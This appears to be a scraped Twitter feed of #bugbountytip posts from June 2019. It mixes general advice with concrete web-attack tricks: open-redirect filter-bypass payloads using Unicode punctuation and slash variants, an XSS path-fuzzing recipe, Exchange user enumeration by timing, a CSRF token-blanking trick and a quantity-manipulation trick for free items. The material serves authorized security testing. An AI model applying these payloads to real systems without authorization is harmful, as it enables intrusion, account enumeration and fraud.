28 [ #bugbountytip ] Open Redirection : If https:// are blacklisted then Try Japanese Punctuation Symbols like ใ€ฑ, ใƒผ , ใ‚ , ใ€ต , ใ€ฝ , ใ€ณ etc Example : ใ‚google%2Ecom /ใ‚google%2Ecom - Also try Unicode of these Symbols . #BugBounty #CyberSecurity #bugbountytips #infosec #infosec19
Petko D. Petkov
@pdp


2019-07-01 07:44:10
1 What is your average severity level? #bugbountytip #bugbountytips
Ameen
@ameenmaali


2019-07-01 07:15:41
1 #BugBountyTip: Take a break/relax every so often! After trying to learn too aggressively for 5 months straight, I got burnt out and submitted nearly nothing for a month+, going from my best to worst month. I’m feeling much better and ready to get back to it now in a relaxed pace https://t.co/IO7OoP88qf
Sarvagya Sagar
@0ffensivemitthu


2019-07-01 00:20:12
2 - #bugbountytip #0xWilt What I Learned Today #03 : Open Redirection : If domain name is blacklisted , then try IP Address in Canonical notation , Decimal , hex or octal notation to bypass blacklisted domain . #bugbountytips
Garth Humphreys
@garthhumphreys


2019-06-30 23:36:56
2 So basically... the #recon phase never ends. Keep digging for more info #bugbounty #bugbountytip #hacking #infosec
ᴂ
@pouyana1


2019-06-30 20:57:45
2 enumerating exchange users through outlook web login page: invalid users have longer response time than valid users, an attacker can use this feature to enumerate a list of users, valid users response in lesser time than invalid user. #bugbountytip #infosec #hacking #hack
Petko D. Petkov
@pdp


2019-06-30 20:15:59
4 Tracking 197 bug bounty programs like a pro. I don't know about your shell scripts but this thing is hot. #bugbountytip https://t.co/WA5AznSIyr
Nikos Gkogkos
@ngkogkos


2019-06-30 20:12:42
16 Do you have a big list of URLs & want to fuzz them for XSS in the URL path? Use @TomNomNom's meg tool! 1. Add /?xss=xss1"2<3%22' in paths.txt 2. meg -L -c 5 paths.txt urls.txt ./megxss_out 3. grep -HC5 'xss1"' --color ./megxss_out/*/* #bugbounty #bugbountytip #pentest #infosec
Mhamed Kchikech
@mhamed_kchikech


2019-06-30 17:23:38
1 @SecuAudit @Hacker0x01 It's more like a #BugBountyTip
Sarvagya Sagar
@0ffensivemitthu


2019-06-30 15:15:08
13 What I learned Today : My Daily dose of progress thread. In this thread I will post whatever I learn, read or watch related to #infosec , #BugBounty , #bugbountytip , #Hacking, #CyberSecurity, #OSINT .Make sure to follow it to get regular quality content. Retweet to invite others
Fisher
@Regala_


2019-06-30 09:58:54
6 It's always good fun to hang out with @stokfredrik, shooting this video only felt natural 🙏🙏🙏 #bugbounty #bugbountytip https://t.co/8MHud7mIeX
n a f f y
@nnwakelam


2019-06-30 09:33:02
20 Learn to fuzz all available inputs and start inferring things based upon what you are being returned #bugbountytip
Navneet
@na5n33t


2019-06-30 08:32:52
4 CSRF token was absent in POST request but value of parameter wishlistID is unique and not known to attacker can protect it from CSRF. Tried to submit it with blank value and successfully able to perform CSRF. Waiting for reply of team. #bugbountytip #hackerone #bugcrowd #infosec
Ashraf .G.
@U2w0k


2019-06-29 22:17:41
5 Got an XSS vulnerability but the domain is behind the annoying CloudFlare WAF .. couldn't get the original IP of the domain and couldn't bypass it neither. any suggestions? #BugBounty #togetherwehitharder #bugbountytip
Ammar Amer
@cry__pto


2019-06-29 21:08:52
5 surprise! all the links that i am sharing on my GitHub repository . been stored on my PC hard drive as a PDF files,there is more than 1,300 article as a PDF files,i am gonna share these file also on my GitHub repository. #Hacking #BugBounty #infosec #bugbountytip
SaadAhmed
@XSaadAhmedX


2019-06-29 19:33:23
168 BugBountyTip: If you playing with `API ENDPOINT` always try to send `INVALID CONTENT TYPE` end-up by getting hidden endpoints in `RESPONSE` #bugbountytip #bugbountytips #bugbounty https://t.co/fcaDHtJxiH
Yadhavi
@PrincessYadhavi


2019-06-29 18:12:36
1 I tried to scan a target with masscan, the input file has 522 hosts but masscan only scan 438 hosts. why?strange! PS: ( --rate=500) #masscan #bugbounty #bugbountytip #bugbountyhelp
Michael Blake
@Michael1026H1


2019-06-29 17:23:46
6 #bugbountytip The Burp extension Scan Check Builder is fantastic. You can build your own scan checks. Personally, I use this to passively detect and report things like URLs as parameter values and suspicious parameter names for manual testing.
iNoSec
@IsecEmAll


2019-06-29 10:28:43
1 If some bug Bounty hunter are against sharing their tools, because they Can lose some bounties, what do we think when they share others tools on twitter?? Rabbit hole or that's because that's not their own tools?? #bugbountytips #bugbountytip
CryptoCris
@cryptocris88


2019-06-28 16:44:48
9 Dev Update 2 - June We will challenge our dev community to find bugs with our Bug Bounty Program to win rewards up to $5,000. More information later. Also: dApp competition soon! https://t.co/crInkoRQNV #blockchain #bugbounty #bugbountytip #developers #gamedeveloper
Régis Deldicque
@RegisDeldicque


2019-06-28 13:17:31
1 #bugbounty #Bugbountytip #Hacking I wish to compare technical mechanisms in order to protect http flows. In the diagram below, I used a cost/complexity representation. Does it seem to you correct ? https://t.co/N0AWz0uVNW
Ali Çelebi
@_alicelebi


2019-06-28 06:26:32
3 Has anyone had successful stored XSS on Angular app recently? Would you mind sharing the payload? #BugBountyTip #bugbounty
m0z
@LooseSecurity


2019-06-27 23:48:12
6 Everytime I tell someone I'm a hacker. 😂 https://t.co/2k2YRO1wIY #BugBounty #bugbountytip #bugbountytips #infosec #infosecurity
detroitsmash and 22 others
@detroitsmassh


2019-06-27 21:39:19
7 If you are using burp’s match&replace feature for spoofing cors origin then changed it with something: https://t.co/FUG19N5qeS instead of default one. Coz developers mostly forgets to escape dot with \. in their regex #bugbountytip
1984isnow📖
@_gonzacabrera


2019-06-27 19:00:49
1 Me downloading Burp Suite Professional cracked. #Infosec #BugBounty #BugBountyTip #ProTip #VolveCristina https://t.co/VvJQHNXak5
C1h2e1
@C1h2e11


2019-06-27 15:50:39
4 https://t.co/cJ8kHgdWmM make your recon more fast and more easy #BugBountyTip #bugbounty #bugbountytips https://t.co/vr7ilRtyAc
Malav Sharma (Wolfdroid)
@ShMalav


2019-06-27 08:23:11
8 one liner to replace one word to another in a file in vim :%s/old_word/new_word/g this will replace the old word from all lines if present to new word .. #bugbountytips #bugbountytip
Osama Avvan
@osamaavvan


2019-06-27 06:11:10
39 A writeup about CORS TO CSRF @Bugcrowd #BugBounty #bugbountytip https://t.co/7oeic4UuA3
David Alison
@Nokibulislam1


2019-06-26 15:32:28
0 Open Redirect : If http:// is blacklisted then try to Play with (Forward/Backward) Slash , browsers act as // Ex: //google%2Ecom ; /\google%2Ecom ; \/google.com ; /\/\google%2Ecom ; \/\google%2Ecom ; \/\/google.com ; #BugBounty #bugbountytip #infosec19 #infosec #cybersecurity
mAshraf
@mAshraf9_


2019-06-26 15:10:16
0 A security engineer's strength lies not in his skills or in the number of ZERO day of attacks he knows, but in the intensity of his understanding about security issue. #bugbountytip #bugbounty #bugbountyquote
Akshay Kumar Malhi
@Kumar_Akkiy


2019-06-26 10:06:18
0 Guys I got private invitation program from #hackerone, after getting 26 points on hackerone CTF program, so I need your feedback on private invitation programs. @KHIZER_JAVED47 @PratikY9967 @D0rkerDevil @AliRazzaq_ Thanks 🙏 #BugBounty #bugbountytip #togetherwehitharder
🕋 wareeq shile👨🏾‍💻
@wareeq_shile


2019-06-25 18:56:13
11 For monitoring js files https://t.co/93m2ozPlqe. Thanks for sharing @Mahmoud0x00 #bugbountytips #bugbounty #bugbountytip #BugBounty
Fisher
@Regala_


2019-06-25 18:39:36
3 When writing a report involving different user roles, if possible, include your own testing credentials so it's easier for the team to validate. Happy triager = happy hacker 🥳 #bugbounty #bugbountytip
Sarvagya Sagar
@0ffensivemitthu


2019-06-25 14:48:52
43 Open Redirection -- You can use Chinese Separator "。" (%E3%80%82) instead of dot "." (%2E) when dot is blacklisted ... Example : target%2Ecom/reset-pass/users-token?go=google%E3%80%82com #bugbounty #bugbountytips #bugbountytip #Infosec #infosec19 #vulnerability #CyberSecurity
Broly
@Broly157


2019-06-25 14:37:26
0 @fuomag9 hey brother congrats for your 1st bug bounty. Can u give me some #bugbountytip.?? Plzz. I'm still studying various articles.
Thibeault
@thibeault_chenu


2019-06-25 11:49:06
2 @intigriti In the case of an e-commerce site, try to multiply the quantity by a value close to 0 (0.00008.....) this can allow you to get items for free. Tested at a food delivery site recently ๐Ÿ‘‡ #BugBounty #BugBountyTip #HackWithIntigriti https://t.co/AzemqbmH2I
plenum 🇹🇳
@plenumlab


2019-06-25 11:16:20
24 Bash oneliner: - remove trailing characters/dots from large file cat myfile | while read i; do echo "${i%.}"; done - remove characters/dots from beginning of line cat myfile | while read i; do echo "${i#.}"; done Replace the . with anything you want #BugBounty #bugbountytip
0xd0m7
@0xd0m7


2019-06-25 09:14:21
37 #bugbountytip if you find a file like that "rest/v1/ swagger.json" it might be interesting to use the OpenAPI Parser BurpSuite plugin to do a quick job ;) https://t.co/PcAmOLRgai